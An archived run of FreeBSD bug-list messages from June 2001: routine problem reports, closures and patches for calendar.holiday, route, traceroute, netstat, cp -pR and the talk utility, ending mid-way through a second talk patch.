(8.11.3/8.11.3) id f58BhfE62455; Fri, 8 Jun 2001 04:43:41 -0700 (PDT) (envelope-from nobody) Message-Id: <200106081143.f58BhfE62455@freefall.freebsd.org> Date: Fri, 8 Jun 2001 04:43:41 -0700 (PDT) From: Warragul@selcon.com.au To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: bin/27960: Incorrect date in calendar.holiday Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 27960 >Category: bin >Synopsis: Incorrect date in calendar.holiday >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Fri Jun 08 04:50:02 PDT 2001 >Closed-Date: >Last-Modified: >Originator: Harley Anderson >Release: 4.3-Stable >Organization: >Environment: FreeBSD satan 4.3-STABLE FreeBSD 4.3-STABLE #2: Thu May 24 05:48:16 EST 2001 root@:/usr/obj/usr/src/sys/SATAN i386 >Description: The date for Australia day in src/usr.bin/caldendar/calenders/calendar.holiday is incorrect. From looking through webcvs it seems like the error is in Open/NetBSD also. >How-To-Repeat: n/a >Fix: --- calendar.holiday Sun Apr 22 00:07:05 2001 +++ calendar.holiday Fri Jun 8 21:10:53 2001 @@ -41,7 +41,7 @@ 01/23 National Handwriting Day 01/24 Economic Liberation Day in Togo 01/26 Republic Day in India -01/30 Australia Day in Australia +01/26 Australia Day in Australia 02/01 Chinese New Year Holiday (3 days) in Taiwan 02/02 Candlemas 02/04 Independence Commemoration Day in Sri Lanka >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Jun 8 4:54:15 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id BE89D37B415; Fri, 8 Jun 2001 04:54:10 -0700 (PDT) (envelope-from phk@FreeBSD.org) Received: (from phk@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f58BsAJ63394; Fri, 8 Jun 2001 04:54:10 -0700 (PDT) (envelope-from phk) Date: Fri, 8 Jun 2001 04:54:10 -0700 (PDT) From: Message-Id: <200106081154.f58BsAJ63394@freefall.freebsd.org> To: Warragul@selcon.com.au, phk@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/27960: Incorrect date in calendar.holiday Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: Incorrect date in calendar.holiday State-Changed-From-To: open->closed State-Changed-By: phk State-Changed-When: Fri Jun 8 04:54:03 PDT 2001 State-Changed-Why: fixed. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=27960 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Jun 8 6:24:27 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C600637B401; Fri, 8 Jun 2001 06:24:25 -0700 (PDT) (envelope-from ru@FreeBSD.org) Received: (from ru@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f58DOPm77871; Fri, 8 Jun 2001 06:24:25 -0700 (PDT) (envelope-from ru) Date: Fri, 8 Jun 2001 06:24:25 -0700 (PDT) From: Message-Id: <200106081324.f58DOPm77871@freefall.freebsd.org> To: mab@red-bean.com, ru@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: misc/26833: `route change default' broken when gateway is over down interface Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: `route change default' broken when gateway is over down interface State-Changed-From-To: open->closed State-Changed-By: ru State-Changed-When: Fri Jun 8 06:19:36 PDT 2001 State-Changed-Why: This is the normal behavior of the route(8) command. Kernel just tells you that the gateway route could not be allocated for a route due to a misconfigured routing table. I've put some explanations here: sbin/route/route.c,v 1.47 sbin/route/route.8,v 1.25 http://www.FreeBSD.org/cgi/query-pr.cgi?pr=26833 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Jun 8 6:25:14 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id ADE6037B405; Fri, 8 Jun 2001 06:25:12 -0700 (PDT) (envelope-from ru@FreeBSD.org) Received: (from ru@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f58DPC477997; Fri, 8 Jun 2001 06:25:12 -0700 (PDT) (envelope-from ru) Date: Fri, 8 Jun 2001 06:25:12 -0700 (PDT) From: Message-Id: <200106081325.f58DPC477997@freefall.freebsd.org> To: ru@FreeBSD.org, freebsd-bugs@FreeBSD.org, ru@FreeBSD.org Subject: Re: misc/26833: `route change default' broken when gateway is over down interface Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: `route change default' broken when gateway is over down interface Responsible-Changed-From-To: freebsd-bugs->ru Responsible-Changed-By: ru Responsible-Changed-When: Fri Jun 8 06:24:34 PDT 2001 Responsible-Changed-Why: Mark as mine, for future references. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=26833 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Jun 8 6:56:47 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id E986937B406; Fri, 8 Jun 2001 06:56:42 -0700 (PDT) (envelope-from ru@FreeBSD.org) Received: (from ru@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f58DtMB60457; Fri, 8 Jun 2001 06:55:22 -0700 (PDT) (envelope-from ru) Date: Fri, 8 Jun 2001 06:55:22 -0700 (PDT) From: Message-Id: <200106081355.f58DtMB60457@freefall.freebsd.org> To: oogali@intranova.net, ru@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/17739: Traceroute will not compile without IPSEC Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: Traceroute will not compile without IPSEC State-Changed-From-To: open->closed State-Changed-By: ru State-Changed-When: Fri Jun 8 06:54:26 PDT 2001 State-Changed-Why: Fixed by shin in traceroute/Makefile,v 1.13 ... http://www.FreeBSD.org/cgi/query-pr.cgi?pr=17739 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Jun 8 6:57:34 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 7DCF637B401; Fri, 8 Jun 2001 06:57:33 -0700 (PDT) (envelope-from ru@FreeBSD.org) Received: (from ru@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f58DvXj68529; Fri, 8 Jun 2001 06:57:33 -0700 (PDT) (envelope-from ru) Date: Fri, 8 Jun 2001 06:57:33 -0700 (PDT) From: Message-Id: <200106081357.f58DvXj68529@freefall.freebsd.org> To: ru@FreeBSD.org, freebsd-bugs@FreeBSD.org, shin@FreeBSD.org Subject: Re: bin/17739: Traceroute will not compile without IPSEC Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: Traceroute will not compile without IPSEC Responsible-Changed-From-To: freebsd-bugs->shin Responsible-Changed-By: ru Responsible-Changed-When: Fri Jun 8 06:56:55 PDT 2001 Responsible-Changed-Why: ... and forgotten for far too long. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=17739 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Jun 8 7:12:30 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 7BBFA37B405; Fri, 8 Jun 2001 07:12:28 -0700 (PDT) (envelope-from ru@FreeBSD.org) Received: (from ru@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f58ECSf85893; Fri, 8 Jun 2001 07:12:28 -0700 (PDT) (envelope-from ru) Date: Fri, 8 Jun 2001 07:12:28 -0700 (PDT) From: Message-Id: <200106081412.f58ECSf85893@freefall.freebsd.org> To: wrsomsky@halcyon.com, ru@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: misc/11689: Change "netstat" mode in daily "status-network" script Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: Change "netstat" mode in daily "status-network" script State-Changed-From-To: open->closed State-Changed-By: ru State-Changed-When: Fri Jun 8 07:09:36 PDT 2001 State-Changed-Why: FreeBSD 4.2-RELEASE and later have daily_status_network_usedns="NO" periodic.conf(5) knob. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=11689 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Jun 8 8:46: 6 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 9168F37B405; Fri, 8 Jun 2001 08:46:04 -0700 (PDT) (envelope-from ru@FreeBSD.org) Received: (from ru@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f58Fk4098320; Fri, 8 Jun 2001 08:46:04 -0700 (PDT) (envelope-from ru) Date: Fri, 8 Jun 2001 08:46:04 -0700 (PDT) From: Message-Id: <200106081546.f58Fk4098320@freefall.freebsd.org> To: frank@google.com, ru@FreeBSD.org, freebsd-bugs@FreeBSD.org, ru@FreeBSD.org Subject: Re: bin/21546: netstat -rn output needs netmask info added Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: netstat -rn output needs netmask info added State-Changed-From-To: open->closed State-Changed-By: ru State-Changed-When: Fri Jun 8 08:43:34 PDT 2001 State-Changed-Why: Fixed in 5.0-CURRENT, in netstat/route.c,v 1.49. netstat(1) now prints at least 2 bytes for class B networks and at least 3 bytes for class C networks. MFC into 4.3-STABLE within a week. Responsible-Changed-From-To: freebsd-bugs->ru Responsible-Changed-By: ru Responsible-Changed-When: Fri Jun 8 08:43:34 PDT 2001 Responsible-Changed-Why: The fix was mine. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=21546 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Jun 8 10:40:10 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 59B6337B405 for ; Fri, 8 Jun 2001 10:40:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f58He1616536; Fri, 8 Jun 2001 10:40:01 -0700 (PDT) (envelope-from gnats) Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id A89DA37B405 for ; Fri, 8 Jun 2001 10:35:52 -0700 (PDT) (envelope-from nobody@FreeBSD.org) Received: (from nobody@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f58HZqn16177; Fri, 8 Jun 2001 10:35:52 -0700 (PDT) (envelope-from nobody) Message-Id: <200106081735.f58HZqn16177@freefall.freebsd.org> Date: Fri, 8 Jun 2001 10:35:52 -0700 (PDT) From: christophe.deroulers@ens.fr To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: bin/27970: cp -pR does not preserve modification times of the directories if they are not empty Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 27970 >Category: bin >Synopsis: cp -pR does not preserve modification times of the directories if they are not empty >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Fri Jun 08 10:40:01 PDT 2001 >Closed-Date: >Last-Modified: >Originator: Christophe Deroulers >Release: FreeBSD 4.2-RELEASE >Organization: Ecole normale superieure >Environment: FreeBSD pc-aa3.ens.fr 4.2-RELEASE FreeBSD 4.2-RELEASE #0: Mon Nov 20 13:02:55 GMT 2000 jkh@bento.FreeBSD.org:/usr/src/sys/compile/GENERIC i386 >Description: If a directory is not empty, cp -pR will correctly set the modification time of the directory after copy but will overwrite it with the current time when it will add the files inside the directory. A similar problem occured with OpenBSD cp's and it was fixed some days ago, so it probably comes from the base code taken from BSD. NB This is maybe the same problem as bin/16155. >How-To-Repeat: mkdir a touch a/b touch -m -t 01010000 a # a has now time January, 1st at 00:00 cp -pR a b # b should have time January, 1st but has not. >Fix: Look at OpenBSD cp bug fix ? >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Jun 8 10:44:33 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 9535737B401; Fri, 8 Jun 2001 10:44:30 -0700 (PDT) (envelope-from schweikh@FreeBSD.org) Received: (from schweikh@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f58HiUa17020; Fri, 8 Jun 2001 10:44:30 -0700 (PDT) (envelope-from schweikh) Date: Fri, 8 Jun 2001 10:44:30 -0700 (PDT) From: Message-Id: <200106081744.f58HiUa17020@freefall.freebsd.org> To: cnoel@cisco.com, schweikh@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: gnu/7951: The gnu readline library core dumps when the numeric keypad is typed. Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: The gnu readline library core dumps when the numeric keypad is typed. State-Changed-From-To: open->closed State-Changed-By: schweikh State-Changed-When: Fri Jun 8 10:41:52 PDT 2001 State-Changed-Why: We're using a newer readline (4.2.) lib for quite some time now which according to the originator fixed the problem. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=7951 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Jun 8 11: 0: 8 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 0135A37B401 for ; Fri, 8 Jun 2001 11:00:04 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f58I03d18684; Fri, 8 Jun 2001 11:00:03 -0700 (PDT) (envelope-from gnats) Date: Fri, 8 Jun 2001 11:00:03 -0700 (PDT) Message-Id: <200106081800.f58I03d18684@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Peter Pentchev Subject: Re: bin/27970: cp -pR does not preserve modification times of the directories if they are not empty Reply-To: Peter Pentchev Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR bin/27970; it has been noted by GNATS. From: Peter Pentchev To: christophe.deroulers@ens.fr Cc: freebsd-gnats-submit@FreeBSD.org Subject: Re: bin/27970: cp -pR does not preserve modification times of the directories if they are not empty Date: Fri, 8 Jun 2001 20:55:13 +0300 On Fri, Jun 08, 2001 at 10:35:52AM -0700, christophe.deroulers@ens.fr wrote: > > >Number: 27970 > >Category: bin > >Synopsis: cp -pR does not preserve modification times of the directories if they are not empty > >Originator: Christophe Deroulers > >Release: FreeBSD 4.2-RELEASE > >Organization: > Ecole normale superieure > >Environment: > FreeBSD pc-aa3.ens.fr 4.2-RELEASE FreeBSD 4.2-RELEASE #0: Mon Nov 20 13:02:55 GMT 2000 jkh@bento.FreeBSD.org:/usr/src/sys/compile/GENERIC i386 > > >Description: > If a directory is not empty, cp -pR will correctly set the modification time of the directory after copy but will overwrite it with the current time when it will add the files inside the directory. > > A similar problem occured with OpenBSD cp's and it was fixed some days ago, so it probably comes from the base code taken from BSD. > > NB This is maybe the same problem as bin/16155. > > >How-To-Repeat: > mkdir a > touch a/b > touch -m -t 01010000 a > # a has now time January, 1st at 00:00 > cp -pR a b > # b should have time January, 1st but has not. > > >Fix: > Look at OpenBSD cp bug fix ? Even before looking at this in detail, I feel like it might be very similar to the one in PR bin/20646.. And apparently the patch in bin/20646 does not quite fix it - I can reproduce this here, although I'm running with that patch. G'luck, Peter -- I am not the subject of this sentence. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Jun 8 11:20: 6 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 10CF037B409 for ; Fri, 8 Jun 2001 11:20:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f58IK1c22809; Fri, 8 Jun 2001 11:20:01 -0700 (PDT) (envelope-from gnats) Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 9E5C637B42A for ; Fri, 8 Jun 2001 11:15:13 -0700 (PDT) (envelope-from nobody@FreeBSD.org) Received: (from nobody@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f58IFDC22522; Fri, 8 Jun 2001 11:15:13 -0700 (PDT) (envelope-from nobody) Message-Id: <200106081815.f58IFDC22522@freefall.freebsd.org> Date: Fri, 8 Jun 2001 11:15:13 -0700 (PDT) From: glenbob57@hotmail.com To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: misc/27971: Do not want my name on your mailing list, please take me off. Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 27971 >Category: misc >Synopsis: Do not want my name on your mailing list, please take me off. >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Fri Jun 08 11:20:00 PDT 2001 >Closed-Date: >Last-Modified: >Originator: Glenda >Release: >Organization: >Environment: >Description: >How-To-Repeat: >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Jun 8 11:30:48 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 13CD737B406; Fri, 8 Jun 2001 11:30:47 -0700 (PDT) (envelope-from roam@FreeBSD.org) Received: (from roam@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f58IUlc23880; Fri, 8 Jun 2001 11:30:47 -0700 (PDT) (envelope-from roam) Date: Fri, 8 Jun 2001 11:30:47 -0700 (PDT) From: Message-Id: <200106081830.f58IUlc23880@freefall.freebsd.org> To: glenbob57@hotmail.com, roam@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: misc/27971: Do not want my name on your mailing list, please take me off. Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: Do not want my name on your mailing list, please take me off. State-Changed-From-To: open->closed State-Changed-By: roam State-Changed-When: Fri Jun 8 11:24:44 PDT 2001 State-Changed-Why: If you are subscribed to a FreeBSD mailing list, take a look at the mail headers: there is a List-Unsubscribe header with unsubscribing instructions. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=27971 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Jun 8 12:30:13 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C1F1037B405 for ; Fri, 8 Jun 2001 12:30:07 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f58JU7V32753; Fri, 8 Jun 2001 12:30:07 -0700 (PDT) (envelope-from gnats) Received: from eeyore.sebster.com (e163161.upc-e.chello.nl [213.93.163.161]) by hub.freebsd.org (Postfix) with SMTP id 20CEF37B407 for ; Fri, 8 Jun 2001 12:20:27 -0700 (PDT) (envelope-from sebster@eeyore.sebster.com) Received: (qmail 30069 invoked by uid 1000); 8 Jun 2001 19:19:57 -0000 Message-Id: <20010608191957.30068.qmail@eeyore.sebster.com> Date: 8 Jun 2001 19:19:57 -0000 From: sebster@sebster.com Reply-To: sebster@sebster.com To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.113 Subject: bin/27972: talk feature Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 27972 >Category: bin >Synopsis: losing information with talk >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Fri Jun 08 12:30:07 PDT 2001 >Closed-Date: >Last-Modified: >Originator: Sebastiaan van Erk >Release: FreeBSD 4.3-STABLE i386 >Organization: Insight Information Technologies >Environment: System: FreeBSD eeyore.sebster.com 4.3-STABLE FreeBSD 4.3-STABLE #0: Sat May 26 11:07:12 CEST 2001 root@eeyore.sebster.com:/usr/src/sys/compile/EEYORE i386 >Description: Using the talk utility it is possible to communicate to other users, however if they have something to say that is longer than your buffer you lose the information without any way to check what was said. >How-To-Repeat: Say a lot to somebody in a talk window in a short amount of time. >Fix: A very simple fix which would make talk about 1000 times more convenient (IMHO) would be to flip the windows: put "me" in the bottom, and "him" in the top window. That way, whether you are on the console or in an xterm, you can scroll back to see what the other person said. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Jun 8 13:50:11 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id A925337B401 for ; Fri, 8 Jun 2001 13:50:04 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f58Ko4342320; Fri, 8 Jun 2001 13:50:04 -0700 (PDT) (envelope-from gnats) Date: Fri, 8 Jun 2001 13:50:04 -0700 (PDT) Message-Id: <200106082050.f58Ko4342320@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Sebastiaan van Erk Subject: Re: bin/27972: losing information with talk Reply-To: Sebastiaan van Erk Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR bin/27972; it has been noted by GNATS. From: Sebastiaan van Erk To: freebsd-gnats-submit@FreeBSD.org Cc: Subject: Re: bin/27972: losing information with talk Date: Fri, 8 Jun 2001 22:46:21 +0200 Hi, I patched talk running at home with the following patch to flip the "him" and "me" windows, tested it, and it semes to work. There also seems to be a bug in init_disp.c with the line (around line 104): idlok(my_win.x_win, TRUE); in the block where his_win is initialized... Shouldn't that read "his_win"? As is, the original code contains the above statement twice. Greetings, Sebastiaan van Erk ----------------------------------->8--------------------------------------- diff -c -r talk.orig/init_disp.c talk/init_disp.c *** talk.orig/init_disp.c Fri Jun 8 22:26:26 2001 --- talk/init_disp.c Fri Jun 8 22:26:00 2001 *************** *** 90,111 **** signal(SIGINT, sig_sent); signal(SIGPIPE, sig_sent); /* curses takes care of ^Z */ ! my_win.x_nlines = LINES / 2; my_win.x_ncols = COLS; ! my_win.x_win = newwin(my_win.x_nlines, my_win.x_ncols, 0, 0); idlok(my_win.x_win, TRUE); scrollok(my_win.x_win, TRUE); wclear(my_win.x_win); ! his_win.x_nlines = LINES / 2 - 1; his_win.x_ncols = COLS; ! his_win.x_win = newwin(his_win.x_nlines, his_win.x_ncols, ! my_win.x_nlines+1, 0); ! idlok(my_win.x_win, TRUE); scrollok(his_win.x_win, TRUE); wclear(his_win.x_win); ! line_win = newwin(1, COLS, my_win.x_nlines, 0); #if defined(hline) || defined(whline) || defined(NCURSES_VERSION) whline(line_win, 0, COLS); #else --- 90,111 ---- signal(SIGINT, sig_sent); signal(SIGPIPE, sig_sent); /* curses takes care of ^Z */ ! my_win.x_nlines = LINES / 2 - 1; my_win.x_ncols = COLS; ! my_win.x_win = newwin(my_win.x_nlines, my_win.x_ncols, ! his_win.x_nlines + 1, 0); idlok(my_win.x_win, TRUE); scrollok(my_win.x_win, TRUE); wclear(my_win.x_win); ! his_win.x_nlines = LINES / 2; his_win.x_ncols = COLS; ! his_win.x_win = newwin(his_win.x_nlines, his_win.x_ncols, 0, 0); ! idlok(his_win.x_win, TRUE); scrollok(his_win.x_win, TRUE); wclear(his_win.x_win); ! line_win = newwin(1, COLS, his_win.x_nlines, 0); #if defined(hline) || defined(whline) || defined(NCURSES_VERSION) whline(line_win, 0, COLS); #else diff -c -r talk.orig/io.c talk/io.c *** talk.orig/io.c Fri Jun 8 22:26:26 2001 --- talk/io.c Fri Jun 8 22:14:35 2001 *************** *** 124,133 **** p_error(string) char *string; { ! wmove(my_win.x_win, current_line, 0); ! wprintw(my_win.x_win, "[%s : %s (%d)]\n", string, strerror(errno), errno); ! wrefresh(my_win.x_win); move(LINES-1, 0); refresh(); quit(); --- 124,133 ---- p_error(string) char *string; { ! wmove(his_win.x_win, current_line, 0); ! wprintw(his_win.x_win, "[%s : %s (%d)]\n", string, strerror(errno), errno); ! wrefresh(his_win.x_win); move(LINES-1, 0); refresh(); quit(); *************** *** 140,148 **** message(string) char *string; { ! wmove(my_win.x_win, current_line, 0); ! wprintw(my_win.x_win, "[%s]\n", string); ! if (current_line < my_win.x_nlines - 1) current_line++; ! wrefresh(my_win.x_win); } --- 140,148 ---- message(string) char *string; { ! wmove(his_win.x_win, current_line, 0); ! wprintw(his_win.x_win, "[%s]\n", string); ! if (current_line < his_win.x_nlines - 1) current_line++; ! wrefresh(his_win.x_win); } To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Jun 8 14:10:14 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 1C7D637B403 for ; Fri, 8 Jun 2001 14:10:03 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f58LA3k47074; Fri, 8 Jun 2001 14:10:03 -0700 (PDT) (envelope-from gnats) Date: Fri, 8 Jun 2001 14:10:03 -0700 (PDT) Message-Id: <200106082110.f58LA3k47074@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Sebastiaan van Erk Subject: Re: bin/27972: losing information with talk Reply-To: Sebastiaan van Erk Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR bin/27972; it has been noted by GNATS. From: Sebastiaan van Erk To: freebsd-gnats-submit@FreeBSD.org Cc: Subject: Re: bin/27972: losing information with talk Date: Fri, 8 Jun 2001 23:02:33 +0200 Hi, Sorry for my stupidity, but my previous patch was wrong. Here is the final (and tested) patch. Greetings, Sebastiaan van Erk --------------------------------->8------------------------------------------ diff -c -r talk/init_disp.c 